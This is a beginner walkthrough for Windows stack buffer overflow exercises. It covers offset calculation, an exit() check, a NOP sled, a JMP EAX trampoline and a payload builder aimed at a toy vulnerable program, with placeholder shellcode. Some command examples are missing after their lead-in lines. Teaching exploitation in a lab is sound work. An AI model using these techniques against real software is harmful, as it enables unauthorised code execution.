Advanced Windows Buffer Overflows
AWBO Exercises Primer
If you haven't worked with exploitation before or are not sure how to set up your environment for the AWBO exercises, follow this simple walkthrough example using a short exploitable C program.
Things you'll need:
- A disassembler
- A method of delivery
- A debugger
Disassembler:
a) Figure out how the program works.
Familiarize yourself with the logic of the program. Some noteworthy things in particular are:
- Size of stack space created
- Offsets and functions of stack variables
- Calls to subroutines
- Types of input (streams, arguments)
- Branching of execution/jmp statements
Next, look at the executable's disassembly. You can use IDA or anything that'll get the job done.
When reading assembly, especially if you're more accustomed to high-level languages like C, you'll want to avoid trying to absorb the code instruction-by-instruction. Look at blocks of instructions to figure out how they work together to do something useful.
In the example program:
Blocks like this are typical. When a function is called (in this case, our main), the address of the next instruction after call is saved on the stack. This is called the "return address"; once the function terminates, this address lets the processor know where to resume execution.
Once the return address is pushed, the old EBP is also pushed onto the stack and the current ESP is copied into EBP, becoming the new frame pointer. Once that's done, space is reserved on the stack for local variables. In this case, the size of the stack space created is 0x100 (256 bytes).
Furthermore, IDA shows us the offsets of important variables/locations in that reserved space that will be used later by the program. This is displayed above the start of main.
These are also good to take note of for when they're referenced later.
b) What kind of vulnerability are we looking at? How and where is the program exploitable?
The next thing to look for is any area where the program could potentially be vulnerable. For stack-based buffer overflows, this will take the form of user input that is copied onto the stack without validating whether there is enough space reserved for it. String functions like strcpy(), for instance, don't provide any bounds checking beyond stopping at the null terminator, and are typically exploitable.
Our first function call is a call to gets().
As we can see, EAX is loaded with the address of buffer and then supplied as an argument to the gets() call. Since user input will be copied into buffer (on the stack) from stdin with no bounds checking, this looks like a good candidate for a stack-based buffer overflow vulnerability.
From earlier, we know that Buffer is located 0x100 bytes below EBP, at EBP-0x100. Our saved return address is located at EBP+4, so it starts 0x100 + 4 = 260 bytes above the start of Buffer. In order to cleanly overwrite it with our own data, we'll need to supply Buffer with 260 + 4 = 264 bytes.
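The offset arithmetic can be double-checked with a few lines of Python. This is only a sketch: the constant names are made up for illustration, and the values assume the layout described above (Buffer at EBP-0x100, saved return address at EBP+4, 4-byte pointers).

```python
# Offsets relative to EBP, as read from the disassembly in this walkthrough.
BUFFER_OFFSET = -0x100      # Buffer starts at EBP-0x100
RETURN_ADDR_OFFSET = 4      # saved return address sits at EBP+4
POINTER_SIZE = 4            # 32-bit x86 addresses are 4 bytes wide

# Bytes of input written before reaching the first byte of the return address.
bytes_before_return = RETURN_ADDR_OFFSET - BUFFER_OFFSET

# Bytes of input needed to overwrite the return address completely.
bytes_to_overwrite = bytes_before_return + POINTER_SIZE

print(bytes_before_return)  # 260
print(bytes_to_overwrite)   # 264
```

The 260 bytes break down as 256 bytes of reserved stack space plus the 4 bytes of saved EBP that sit between the locals and the return address.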
c) What obstacles and constraints on input are we faced with?
Successful exploitation hinges on hijacking EIP, but even if you've overwritten the return address on the stack, execution will not be yours until you hit your RET instruction. Though a seemingly trivial point, it bears mentioning that this means you'll need to make sure execution doesn't terminate or branch off before you gain control. Input will need to be crafted such that the necessary execution conditions are satisfied.
The first block compares the byte at EBP-FD (EBP-253 in decimal) with the hex value 78 (ASCII 'x'). If they match, execution jumps over the second block entirely, which is a call to exit(). Allowing the program to call exit() will terminate it prematurely, which is very bad for us; execution will never arrive at the RET instruction we're relying on to pop our overwritten return address off the stack and into EIP.
Given this observation, it's safe to say that we need the byte at EBP-FD to be a lowercase 'x'. EBP-FD is three bytes past the start of Buffer (EBP-100), which makes it the fourth byte of our input from standard input. In order for our exploitation to succeed, we'll need to feed 'x' as the fourth character in our payload.
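To see why EBP-FD is the fourth character, here is a small sketch of the index calculation. The helper name `passes_check` is hypothetical; it only mimics the comparison described above and is not taken from the example program.

```python
BUFFER_OFFSET = -0x100      # Buffer starts at EBP-0x100
CHECKED_OFFSET = -0xFD      # the byte the program compares against 'x'
REQUIRED_BYTE = 0x78        # ASCII 'x'

# Zero-based index of the checked byte within our input.
checked_index = CHECKED_OFFSET - BUFFER_OFFSET


def passes_check(payload: bytes) -> bool:
    """Return True if the payload would avoid the exit() branch."""
    return len(payload) > checked_index and payload[checked_index] == REQUIRED_BYTE


print(checked_index)            # 3, i.e. the fourth character
print(passes_check(b"AAAx"))    # True
print(passes_check(b"AAAA"))    # False
```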
Method of Delivery:
a) Delivering your shellcode.
Shellcode is delivered as raw machine-code bytes written for the target platform. These can be defined as a hex string in your scripting language of choice, most often using the \xNN format. Perl is highly recommended: strings are easily created and appended to one another, and you can use Perl's print() function in conjunction with the pipe operator "|" in Cygwin to pump your shellcode output to the exploitable program.
Cygwin is a Linux-like shell environment for Windows. When setting up Cygwin, you also have the option of installing various packages. Make sure you get perl and gcc.
Then from the command line:
or, you can run perl code from the command line with the -e switch:
Furthermore, while it's not necessary for this example, you can also pass the output of a Perl script as an argument on the command line, in which case you'll need to enclose each statement within backticks (`), located on the same key as the tilde (~):
b) Structure your payload to work with the constraints on input and satisfy conditions of execution.
We know from our disassembly that the fourth character we supply to our vulnerable program needs to be lowercase 'x' (0x78). After that, we have 256 bytes to fill before we overwrite the return address. What a fantastic place to put your shellcode! It will, however, need to be padded; the shellcode is only 127 bytes.
The most commonly used padding tends to be what are called "NOP instructions". These are instructions that either perform no operation or perform one that will not interfere with the operation of our shellcode. The latter is, of course, context-dependent. The most common are 0x90 (NOP, which does nothing) and 0x41 (both ASCII "A" and inc ecx, depending on whether it's interpreted as data or as an instruction). The fact that they're single-byte instructions makes them ideal for plugging up holes. Not only that, but if you miss your shellcode and EIP lands somewhere on your padding before your shellcode, the processor will execute these NOP instructions one by one until it gets to the beginning of your shellcode. This technique is called a "NOP sled".
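The amount of padding is easy to get wrong by a byte or two, so it helps to compute it. The following is a sketch: `nop_pad` is a hypothetical helper, and the shellcode is a stand-in of 127 INT 3 bytes (0xCC) rather than a real payload.

```python
NOP = b"\x90"
SLOT_SIZE = 256  # bytes between the 4-byte "AAAx" prefix and the return address


def nop_pad(shellcode: bytes, slot_size: int = SLOT_SIZE) -> bytes:
    """Prefix the shellcode with a NOP sled so the result is slot_size bytes."""
    if len(shellcode) > slot_size:
        raise ValueError("shellcode does not fit in the available space")
    return NOP * (slot_size - len(shellcode)) + shellcode


# Placeholder for the 127-byte shellcode mentioned above (assumption: INT 3 bytes).
placeholder_shellcode = b"\xcc" * 127

padded = nop_pad(placeholder_shellcode)
print(len(padded))                               # 256
print(len(padded) - len(placeholder_shellcode))  # 129 bytes of NOP sled
```

Putting the sled before the shellcode matches the layout used later in this walkthrough, where execution enters near the start of the buffer and slides forward.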
Debugger:
a) Setting up windbg as your post-mortem debugger.
You can register windbg as your post-mortem debugger with the -I option. In Win 2000, you'll want to select "run" from the start menu, browse for the location of windbg (usually debugging tools for Windows), and then append -I as an argument:
Post-mortem means that when a program raises an exception that nothing in the program handles (for example, a crash), Windows launches the registered debugger and attaches it to the faulting process. So, say you overwrite the return address on the stack with "AAAA"; this will cause an Access Violation when the processor tries to resume execution at address 0x41414141, and your debugging environment will fire up automatically.
To make things a little easier to debug, an INT 3 instruction has been added near the beginning of the program. When you execute the program, it'll pop up your debugger automatically, allowing you to step through your code from near the beginning. For more information on how to set up your windbg environment, as well as an explanation of useful commands, check out the windbg cheatsheet.
The commands you'll probably use most for this exercise are p and t (step over/step into respectively), bp 0xNNNNNNNN (set breakpoint at address 0xNNNNNNNN), and g (continue to next breakpoint).
b) Testing hypotheses by observation of stack behavior/registers.
You won't always succeed in popping a shell on the first try. Don't despair!
First, focus on owning EIP. Keep an eye on the stack. Observe its behavior at several different points of execution as well as its effect on the location of your saved return address. Try first overwriting it with ASCII to see if you manage to cause an access violation. Then use a separate 4-byte string, one that's distinguishable from your other padding (if your padding is A's, try "BBBB"), and place it at the point in your payload where you -think- you'll be overwriting the return address. If EIP ends up as 0x42424242 in the debugger, your offset is right; if it shows your padding instead, you're overshooting or undershooting the return address.
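A test payload for this step can be sketched as follows. The function name `marker_payload` is hypothetical, and the default offset of 260 assumes the stack layout worked out earlier in this walkthrough (Buffer at EBP-0x100, return address at EBP+4).

```python
def marker_payload(ret_offset: int = 260, marker: bytes = b"BBBB") -> bytes:
    """Build padding that places a recognizable marker over the return address."""
    prefix = b"AAAx"                       # 4th byte must be 'x' to skip exit()
    padding = b"A" * (ret_offset - len(prefix))
    return prefix + padding + marker


payload = marker_payload()

# The value to expect in EIP if the marker lands on the return address.
# x86 is little-endian, though for "BBBB" the byte order makes no difference.
expected_eip = int.from_bytes(b"BBBB", "little")

print(len(payload))        # 264
print(hex(expected_eip))   # 0x42424242
```

If the debugger reports 0x41414141 instead, the marker missed the return address and the offset needs adjusting.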
If you're still not getting EIP and you swear you've provided enough characters to cause an overflow, the problem may lie in the execution. Try stepping through the program with the debugger to see if you ever reach your RET instruction; maybe something was overlooked. For example, our program calls exit() unless 'x' is the 4th byte of our payload.
c) Dealing with non-stack addresses.
One of the victory conditions for these AWBO exercises is that you must successfully exploit the program without explicitly referencing any stack addresses. In other words, the return address must not be overwritten with an address on the stack, but you may use any other address in memory.
Remember -- data is just data; it's how it's interpreted that's important, and there are other ways to get to the stack. The stack address you need to jump to might still be in one of your registers, or even on the stack itself. If only there were some instruction in memory you could use to your advantage... Hmm...
In our example program, if you set a breakpoint at the address of RET (bp 0x00401038 for me) and examine your registers, you'll notice something: the address of the first byte of our buffer happens to be sitting in the EAX register. A JMP EAX instruction would get us there painlessly. All we need to do is find it in memory.
You can search for bytes, words, doublewords and ASCII in windbg with the "s" command. The syntax is listed in the windbg cheatsheet:
The instruction JMP EAX is FF E0 in hex. You can figure out the hex representation of an instruction in windbg with the "a" command. Hit enter, then type your instruction in assembly.
So let's do a search for the two-byte pattern ff and e0 with the "s" command. When using the search command this way, you don't need to worry about endianness:
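To illustrate what a byte-pattern search does (this is not windbg itself, just a Python sketch over a made-up buffer), the following scans a block of bytes for FF E0 and reports where each match would sit in memory. The `find_all` helper, the sample bytes, and the base address 0x1000 are all assumptions for the example.

```python
def find_all(haystack: bytes, needle: bytes, base: int = 0) -> list:
    """Return the address of every occurrence of needle, given a base address."""
    hits = []
    pos = haystack.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = haystack.find(needle, pos + 1)
    return hits


JMP_EAX = b"\xff\xe0"  # opcode bytes in the order they appear in memory

# Made-up memory contents; a real search runs over the process address space.
sample_memory = bytes.fromhex("9090ffe041ffe0e0ff")

for address in find_all(sample_memory, JMP_EAX, base=0x1000):
    print(hex(address))
# prints 0x1002 and 0x1005
```

Endianness doesn't come into play here because the pattern is matched one byte at a time in memory order; it only matters when a multi-byte value such as an address is written out.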
Let's use the first address, 0x002b4058.
Remember, addresses need to be fed to the payload in reverse byte order because the x86 architecture is little-endian: the least significant byte of the address comes first.
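Rather than reversing the bytes by hand, you can let a packing routine do it. A minimal sketch using Python's standard `struct` module, with the address found above:

```python
import struct

JMP_EAX_ADDR = 0x002B4058  # address of the JMP EAX instruction found by the search

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
packed = struct.pack("<I", JMP_EAX_ADDR)

print(packed.hex())  # 58402b00
```

Note that the last byte is 0x00. Since this address goes at the very end of the payload, the null byte is the final thing written.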
So now, your payload should look something like this:
"AAAx" satisfies our requirement that the 4th byte be "x".
'$filler' is our padding.
'$shellcode' is the code that will actually be executed.
"\x58\x40\x2b\x00" is the address of our JMP EAX instruction, fed to the program in reverse-byte order because of little-endianness.
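Putting the four pieces together, the layout can be sketched in Python as below. This is an illustration under assumptions, not the original script: `build_payload` is a hypothetical helper, the shellcode is a stand-in of 127 INT 3 bytes, and the 260-byte offset and the JMP EAX address are the values from this walkthrough, which may differ on your system.

```python
import struct

PREFIX = b"AAAx"            # 4th byte must be 'x' to skip the exit() call
RET_OFFSET = 260            # bytes of input before the saved return address
JMP_EAX_ADDR = 0x002B4058   # JMP EAX found with the search (may differ for you)


def build_payload(shellcode: bytes) -> bytes:
    """Lay out prefix + NOP filler + shellcode + little-endian return address."""
    room = RET_OFFSET - len(PREFIX)
    if len(shellcode) > room:
        raise ValueError("shellcode does not fit before the return address")
    filler = b"\x90" * (room - len(shellcode))
    payload = PREFIX + filler + shellcode + struct.pack("<I", JMP_EAX_ADDR)
    # gets() stops reading at a newline, so one inside the payload would cut it short.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte")
    return payload


placeholder_shellcode = b"\xcc" * 127   # stand-in only, not real shellcode
payload = build_payload(placeholder_shellcode)

print(len(payload))          # 264
print(payload[-4:].hex())    # 58402b00
```

To deliver it, the bytes would be written to standard output in binary form (for example with `sys.stdout.buffer.write(payload)`) and piped to the program, the same way as with Perl's print().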
Just pipe it to your program, run 'g' from the windbg command line and voila! Calculator!